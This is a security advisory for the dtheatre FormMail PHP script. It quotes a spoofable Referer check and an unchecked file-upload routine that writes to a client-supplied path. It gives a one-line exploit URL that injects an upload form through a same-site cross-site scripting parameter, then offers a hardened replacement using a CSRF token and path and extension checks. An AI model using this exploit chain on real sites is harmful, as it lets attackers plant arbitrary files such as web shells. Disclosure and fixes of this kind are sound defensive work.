
formmail (PHP) Upload file using CSS




Information : 
°°°°°°°°°°°°°° 
Website : http://www.dtheatre.com/scripts/
Version : all
Problem : Upload file



PHP Code/Location : 
°°°°°°°°°°°°°°°°°°° 
formmail.php : 
------------------------------------------------------------------ 
function check_referer($referers) {
   if (count($referers)) {
      $found = false;

      // Take the host part of the Referer header. The header is supplied by
      // the client, so this is not a reliable origin check.
      $temp = explode("/",getenv("HTTP_REFERER"));
      $referer = $temp[2];

      if ($referer=="") {
         $referer = $_SERVER['HTTP_REFERER'];
         list($remove,$stuff)=split('//',$referer,2);
         list($home,$stuff)=split('/',$stuff,2);
         $referer = $home;
      }

      for ($x=0; $x < count($referers); $x++) {
         if (eregi ($referers[$x], $referer)) {
            $found = true;
         }
      }
      if ($referer =="")
         $found = false;
      if (!$found){
         print_error("You are coming from an <b>unauthorized domain.</b>");
         error_log("[FormMail.php] Illegal Referer. (".getenv("HTTP_REFERER").")", 0);
      }
      return $found;
   } else {
      return true; // not a good idea, if empty, it will allow it.
   }
}
------------------------------------------------------------------ 
...
------------------------------------------------------------------ 
// check for a file if there is a file upload it
// $file_name, $file_size, $file and $path_to_file arrive as bare globals;
// path_to_file is a form field (see the hidden input in the exploit below),
// so the client chooses the destination directory and the file name.
if ($file_name) {
   if ($file_size > 0) {
      if (!ereg("/$", $path_to_file))
         $path_to_file = $path_to_file."/";
      $location = $path_to_file.$file_name;
      if (file_exists($path_to_file.$file_name))
         $location = $path_to_file.rand(1000,3000).".".$file_name;
      // plain copy(): no is_uploaded_file()/move_uploaded_file(),
      // no extension or content check before the file lands on disk
      copy($file,$location);
      unlink($file);
      $content .= "Uploaded File: ".$location."\n";
   }
}
------------------------------------------------------------------ 

The REFERER protection can be bypassed so that a file is placed on the site 
(for example through a Cross Site Scripting flaw on the same site). The upload 
code runs even if this feature is deactivated.

Exploit : 
°°°°°°°°° 

http://www.exemple.com/foo.php?css=<form%20method=post%20enctype=multipart/form-data%20action=formmail.php><input%20type=hidden%20name=MAX_FILE_SIZE%20value=1000000><input%20type=hidden%20name=path_to_file%20value=./><input%20type=text%20name=email><input%20type=file%20name=file%20><input%20type=hidden%20name=recipient%20%20value=%20foo@xxxxxxx%20><input%20type=submit>


With :
http://www.exemple.com/formmail.php
and
http://www.exemple.com/file.php?css= <-- Cross Site Scripting Here
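A hardened replacement for the upload block, added here as an example; it is not part of this advisory nor of the dtheatre FormMail script. It assumes PHP 7 or later, a fixed upload directory outside the web root, a form file field named "file", and a CSRF token stored in the session when the form is rendered (all of these are assumptions).

```php
<?php
// Hardened replacement for the upload block above (added example, not the
// dtheatre FormMail code). Assumes PHP >= 7, a fixed upload directory outside
// the web root, a file field named "file", and $_SESSION['csrf_token'] set
// when the form was rendered.
session_start();
define('UPLOAD_DIR', '/var/formmail/uploads');   // never taken from the form
$allowed_ext = array('txt', 'pdf', 'png', 'jpg');
$content = '';                                   // message body, as in FormMail

function reject($msg) {
    error_log("[FormMail.php] upload rejected: $msg", 0);
    exit("Upload rejected.");
}

// 1. Origin check: a session-bound CSRF token, not the Referer header, which
//    the client controls and which a same-site XSS form satisfies.
if (!isset($_POST['csrf_token'], $_SESSION['csrf_token'])
    || !hash_equals($_SESSION['csrf_token'], $_POST['csrf_token'])) {
    reject('bad or missing CSRF token');
}
// 2. Only a file PHP received in this request (no bare $file / $file_name).
if (!isset($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK
    || !is_uploaded_file($_FILES['file']['tmp_name'])) {
    reject('no valid uploaded file');
}
// 3. A requested sub-folder must resolve inside UPLOAD_DIR (blocks "../"
//    and absolute paths supplied in path_to_file).
$base = realpath(UPLOAD_DIR);
$sub  = isset($_POST['path_to_file']) ? $_POST['path_to_file'] : '';
$dir  = realpath(UPLOAD_DIR . '/' . $sub);
if ($base === false || $dir === false
    || ($dir !== $base && strpos($dir, $base . DIRECTORY_SEPARATOR) !== 0)) {
    reject('destination outside upload directory');
}
// 4. Safe name: drop directories, whitelist the extension so no .php/.phtml
//    lands on disk, random prefix instead of rand(1000,3000) to avoid
//    guessable names and silent overwrites.
$orig = basename($_FILES['file']['name']);
$ext  = strtolower(pathinfo($orig, PATHINFO_EXTENSION));
if (!in_array($ext, $allowed_ext, true)) {
    reject("extension '$ext' not allowed");
}
$safe     = preg_replace('/[^A-Za-z0-9._-]/', '_', $orig);
$location = $dir . '/' . bin2hex(random_bytes(8)) . '_' . $safe;
if (!move_uploaded_file($_FILES['file']['tmp_name'], $location)) {
    reject('move_uploaded_file failed');
}
$content .= "Uploaded File: " . $location . "\n";
```

The token check replaces check_referer() entirely; the form that renders the page must emit the same token in a hidden csrf_token field.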



For More details : 
°°°°°°°°°°°°°° 
IRC : hauzgur.serveirc.com / #defaced


Nourredine Himeur

www.security-challenge.com